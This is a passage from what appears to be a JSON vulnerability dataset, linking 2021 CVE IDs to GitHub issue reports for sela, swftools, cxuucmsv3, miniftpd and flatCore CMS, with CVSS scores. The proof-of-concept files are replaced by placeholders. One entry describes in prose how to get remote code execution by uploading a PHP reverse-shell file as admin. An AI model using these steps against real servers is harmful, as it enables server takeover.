        "Issue_Url_new": "https://github.com/saharatul/sela/issues/27",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T04:56:57Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39550",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/30",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/30",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T05:02:24Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39551",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/26",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/26",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T04:54:33Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39552",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/23",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/23",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T02:49:47Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39553",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/103",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/103",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-01T06:55:27Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow grealloc gmem NUMBERTAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39554",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/100",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/100",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-01T02:16:31Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow Lexer Lexer NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39555",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/99",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/99",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-01T02:10:19Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV type3D0 APITAG NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39556",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/105",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/105",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-01T07:01:24Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV type3D1 APITAG NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39558",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/106",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/106",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-02T03:17:40Z",
        "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow APITAG APITAG NUMBERTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39559",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/101",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/101",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-01T02:18:46Z",
        "description": "A SEGV in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV APITAG APITAG NUMBERTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39561",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/102",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/102",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-01T02:31:55Z",
        "description": "A stack overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39562",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/98",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/98",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-01T02:04:36Z",
        "description": "A stack overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow Stream NUMBERTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39563",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/115",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/115",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-05T07:02:23Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39564",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/116",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/116",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-05T07:06:56Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39569",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/114",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/114",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-05T06:59:30Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39574",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/124",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/124",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-05T07:40:08Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output CODETAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39575",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/128",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/128",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:20:06Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39577",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/121",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/121",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-05T07:26:44Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39579",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/125",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/125",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-05T07:42:59Z",
        "description": "A heap buffer overflow in q.c NUMBERTAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39582",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/122",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/122",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-05T07:32:22Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39583",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/136",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/136",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:41:56Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39584",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/130",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/130",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:23:46Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39585",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/133",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/133",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:33:14Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39587",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/129",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/129",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:22:26Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39588",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/131",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/131",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:26:14Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39589",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/132",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/132",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:30:23Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39590",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/137",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/137",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:47:16Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39591",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/135",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/135",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:38:56Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39592",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/138",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/138",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:51:12Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39593",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/139",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/139",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-06T05:53:11Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39594",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/142",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/142",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-07T14:33:40Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39595",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/141",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/141",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-07T14:31:43Z",
        "description": "A stack overflow in q.c NUMBERTAG causes Segmentation fault. System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39596",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/146",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/146",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-07T14:43:02Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39597",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/143",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/143",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-07T14:35:45Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39598",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/145",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/145",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2020-08-07T14:40:34Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39599",
        "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/7",
        "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/7",
        "Repo_new": "cbkhwx/cxuucmsv3",
        "Issue_Created_At": "2021-08-21T06:09:44Z",
        "description": "2 xss vulnerability exists in FILETAG file.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39602",
        "Issue_Url_old": "https://github.com/Gabe-commiter/Miniftpd/issues/1",
        "Issue_Url_new": "https://github.com/gabe-commiter/miniftpd/issues/1",
        "Repo_new": "gabe-commiter/miniftpd",
        "Issue_Created_At": "2021-08-22T10:26:19Z",
        "description": "Buffer overflows problem. Buffer overflow exists in the APITAG function in the APITAG file. Overwrite rbp when new path name length exceeds NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39608",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/52",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/52",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2021-08-13T03:50:15Z",
        "description": "RCE via upload addons plugin. RCE via upload addon plugin It was identified that an authenticated user (admin) has the possibility to upload malicious files without any restriction. In this specific case, arbitrary server side PHP code such as web shells can be uploaded. As a result the attacker can run arbitrary code on the server side with the privileges of the web server. This could lead to a full system compromise. To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS (admin user NUMBERTAG Click on APITAG NUMBERTAG Click on APITAG NUMBERTAG Click on APITAG or APITAG NUMBERTAG Choose a malious PHP file (revershell, APITAG example is FILETAG NUMBERTAG URL for malious PHP file: FILETAG Screenshots This POC for vuln : URLTAG Desktop (please complete the following information): OS: tested in Linux Browser : All Version : Last version Additional context This vulnerability is extremely serious affecting the system. An attacker can take control of the entire server.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-39609",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/53",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/53",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2021-08-13T04:02:13Z",
